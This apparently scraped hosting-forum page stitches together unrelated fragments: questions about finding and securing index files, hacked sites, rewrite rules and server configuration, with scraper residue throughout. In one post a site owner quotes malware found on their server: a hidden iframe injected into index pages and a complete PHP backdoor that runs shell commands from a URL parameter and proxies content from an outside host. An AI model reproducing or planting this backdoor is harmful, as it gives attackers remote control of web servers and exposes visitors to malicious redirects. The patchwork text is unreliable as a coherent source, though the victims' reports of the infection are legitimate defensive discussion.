Found Index Files In Home Direcotry
Apr 25, 2008to found all of index.html files in my /home directory.
how can I found these files?
like this:
/home/a/public_html/index.html
/home/a/public_html/folder/index.html
/home/c/index.html
to found all of index.html files in my /home directory.
how can I found these files?
like this:
/home/a/public_html/index.html
/home/a/public_html/folder/index.html
/home/c/index.html
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
Is it possible to show a default page as the home page of the web site, without setting it as index.html or default.html? This is only on a shared hosting account , so the client does not have access to the apache conf or anything like that.
Here is the site. But, when I move the whole account over to my server, it doesn't show as the home page.
after week when my server upgrade the cpanel automatic i got infected in all
index files like index.html and index.php and index.asp and any index with any
extinstion and this is the code in all files
Code:
<iframe src=[url]
and when i delete this code it come again in all index files
i am in really trouble with my clients and i want to know how can i fix this
thing and never come back again
I was working on WHM of my server sudeenly i saw CPU load was increasing and till when i understand CPU load was on peak of 160%. I tried to find out CPU overloading sites and found that my 4 populer sites were creating problem. I stopped apache and suspanded all 4 sites and rebooted server. After forceful server reboot i found that load was getting normal to 2.5%. I unsuspanded one of 2 forums but even i unsuspanded that forum was not opening (IPB). I logged into ftp suspecting some problem i found that index.php was only 45bytes i have opend index.php and found this text inside .....
View 3 Replies View RelatedI have worked with mod_rewrite for years and never encountered this problem. I am converting html pages to a single php file and it works perfectly. I used htaccess the rewrite the urls to appear the same so that no links would be broken or lose SEO value.
The only problem is that my friend who also helped build the sites added different directories and within those directories are index.htm files that serve as a home page for the separate directory. Like /info/index.htm and /help/index.htm within the root directory. The problem is that for some reason my mod_rewrite directs to the main index.htm rewrite even if I include the whole path to the file. In htaccess I have this so far:
RewriteEngine on
RewriteRule index.htm$ index.php [L]
RewriteRule servers.htm$ index.php?action=servers [L]
RewriteRule movies.htm$ index.php?action=movies [L]
However there is a directory named "info" and inside that directory it has an index.htm file and it seems to conflict with my first mod_rewrite. I tried using:
RewriteRule /info/index.htm$ index.php?action=info [L]
and used other methods but none seem to work any ideas?
nginx will look for web files under /usr/local/nginx/html. However, I want to put my website files under /home/public_html, is that possible with nginx? I can not find many things about nginx conf file explanation,
View 0 Replies View RelatedWhen I was a customer at hostgator, whenever a terminating error within php was displayed it would log in the parent directory in a file called "error_log".
I want this to happen now on our dedicated server. I've looked at my local apache error log and it doesn't appear to show the same info as hostgator's setup showed.
Can anyone tell me how to set that up?
I'll mention this is a cPanel/WHM server with about 15 accounts on it.
I get an e-mail everyday from my server's backup script telling me what new or changed files it found. Yesterday this summary was massive, and it showed new or changed files in these directories:
/proc
and
/home/virtfs
The type of files it contains:
"/home/virtfs/[username]/proc/140/task/140/exe"
"/home/virtfs/[username]/proc/139/exe"
"/home/virtfs/[username]/proc/139/task/139/exe"
"/home/virtfs/[username]/proc/227/exe"
"/home/virtfs/[username]/proc/227/task/227/exe"
"/home/virtfs/[username]/proc/374/exe"
The /home/virtfs directory is something I haven't seen before, and it contained two directories belonging to two accounts on the server.
Does anyone know why these directories would be created or what they are for? The bit of reading I've done on this so far mentions that these directories will be created as a result of jailed SSH, but neither of those two accounts have ever had jailed SSH enabled.
how can I list all files ending with .sql and .tar.gz in /home and save it to a file.
View 8 Replies View RelatedHave a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.
View 1 Replies View RelatedI wanted to list down all files owned by 'root' inside /home directory and all users directory inside /home/users including subfolders and everything!
the command below works but only works when executed within the working directory.
ls -l | awk '{print $3" " $9}' | grep root
how to fix rkhunter from; 'not found' in local files and unknown for exim and php 5.2.5.
System checks
* Allround tests
Checking hostname... Found. Hostname is
Checking for passwordless user accounts... OK
Checking for differences in user accounts... OK. No changes.
Checking for differences in user groups... OK. No changes.
Checking boot.local/rc.local file...
- /etc/rc.local [ OK ]
- /etc/rc.d/rc.local [ OK ]
- /usr/local/etc/rc.local [ Not found ]
- /usr/local/etc/rc.d/rc.local [ Not found ]
- /etc/conf.d/local.start [ Not found ]
- /etc/init.d/boot.local [ Not found ]
* Application version scan
- Exim MTA 4.68 [ Unknown ]
- GnuPG 1.2.6 [ Old or patched version ]
- Apache [unknown] [ OK ]
- Bind DNS 9.2.4 [ OK ]
- OpenSSL 0.9.7a [ Old or patched version ]
- PHP 5.2.5 [ Unknown ]
- PHP 5.2.5 [ Unknown ]
- Procmail MTA 3.22 [ OK ]
- OpenSSH 3.9p1 [ OK ]
I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.
The problem is that their old index.htm page has a pagerank of 4 which we want to keep.
And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.
The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.
My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?
JavaScript, I have heard is completely out the question
I have recently switched from Ubuntu to Mint because I would like to enjoy out of the box functionality. I installed Apache, PHP and Mysql. When I go to localhost, the page displays correctly indicating that the server is functioning. In /var/www/html I created devPages. In devPages I created a symlink to a directory in my home directory where I keep all of my html/php files.
When I point my browser to http://localhost/devPages/1/ I get "You don't have permission to access /devPages/1/ on this server". This appears to be a permissions/ownership issue. I don't want to change the permissions for the directory or files in the home directory because they are set to work properly on my production server. Is there a way to get apache to accept files in my home directory?
I have set owner and group for devPages and the symlink to www-data. Set permissions to 755 for devPages.
By the way, under Ubuntu, I have always used a symlink and it always worked without any issues.
i have amny server , and i got about 7 server got infected
2 weeks ago i got some sites have avirs i delted the code which got added on some index.html & index.php " any index files "
i removed the code and cleaned the servers,
after 2 hrs i saw it back again.
i made scan and i got them back, i replaced the pages with cleaned pages, and removed it again.
but till now it came back after i remove.
how can i protict my server from this issus
I need to clean up the .spamassassin directory for all the accounts on the server. The Bayes files are getting too big and causing mail handling issues.
How would I do that?
I assume this won't work - and don't want to try it until I hear a little feedback:
rm -f /home/*/.spamassassin/*bayes*
Basically, I need a command that will do what the above command looks like it would do - I just don't think the wildcards will work in that manner, and don't want to try it for fear of deleting items outside of the .spamassassin directory.
I'm running CentOS 5.3.x with cPanel/WHM - if it matters...
And feel free to suggest other spam blocking software - but we've gotten rather good at tweaking SA to get the job done. Just this annoyance of the bayes files growing continuously is a pain sometimes...
I recompiled apache and php due to some problems. Now apache and php is running and I have a VB forum running fine. However, one folder has a PHP page named index.php when I type its URL I get it downloaded and it is not executed directly from the server.
when I add "?" to the end of the URL[url]" it runs with no problems!
Is it something wrong with httpd.conf or what?
I have a client who's index will not come up when using "www". Of course I have checked the dns severs and all is well.
View 4 Replies View RelatedI created the subdomain for my site www.mysite/myclientpotentialdomain, with the only purpose to show my client the mock up of his home page using his potential domain name.
The file is named index.htm and consist only the mock up image.
The problem that I encountered is when I refresh the browser (Firefox) the image disappears. I can see the alt tag, but the picture is gone. Works fine in IE though.
The only difference I have noticed that after the refreshment,
how to display the time and date of a file that was added to an Apache file directory on a cPanel server?
It used display the time and date back in the 1.3 and 2.0 days, but it doesn't on the 2.2 versions of Apache.
i have hosted my website on dadicated windows hosting with rackspace. my webiste default page was index.aspx. now i have created new home page with name the of index.html and uploaded this page to server and deleted old home page index.aspx but my new index.html page not showing when i try to open open my website www.example.com but its opening when i try with www.example.com/index.html.
View 4 Replies View RelatedI'm working with HELM panel
I have deleted the index.htm file and uploaded another one
the first one had some images <img>, now
1. when i request the main page [url] the old index file is still appearing!
2. the images that was in the <img> tags of the old index file can't be deleted or renamed : can't be accessed at all.
in many sites in my server torjan in index.html
in <ifram>
how to save my server from that .js torjan
and i need to ask about other thing this torjan can chang any this in backups
One of my customer's domain name's index page is hacked with the pharmacy kind of URLs all over on the homepage. Anyone has idea about this? You can see the URL at
[url]
I don't know what's wrong with the server where the wordpress site is hosted. But in the permalinks, index.php must be included in the permalinks (more information here:[url]
What can be fixed in the server so that wordpress permalinks will work correctly?
I am using WHMCS and need to upload an index.php per server I wish to monitor. How do I go about doing this so that I can view the page via this method
[url]
I'm using cpanel / centos
How to change index manager defaults?
Whenever I set up a new account
I had an untapped image upload site on my server which i forgot. Some guys or children upload something noxious and neutralize all the "index.php". This was a hack attempt with SSH.
We noticed that, close this account delete uploaded files. But there is a quirky problem. Any of index.php's isn't working after this attempt. Index file is working after change its name, example "mindex.php".
We updated all the services, rebuild apache but don't working. We can't use any index.php on the server.
Additionally, there are 34 possible trojans appear on the server. I tried to delete them with BitDefender but can't do that.( I checked that WHM / Scan for Trojan Horses )
Am suffering from a hacker every time, he changes my client’s index (index..Php).
I changed FTP log, but still, it seems doesn’t work!
My simple question: How to protect the index page from hackers?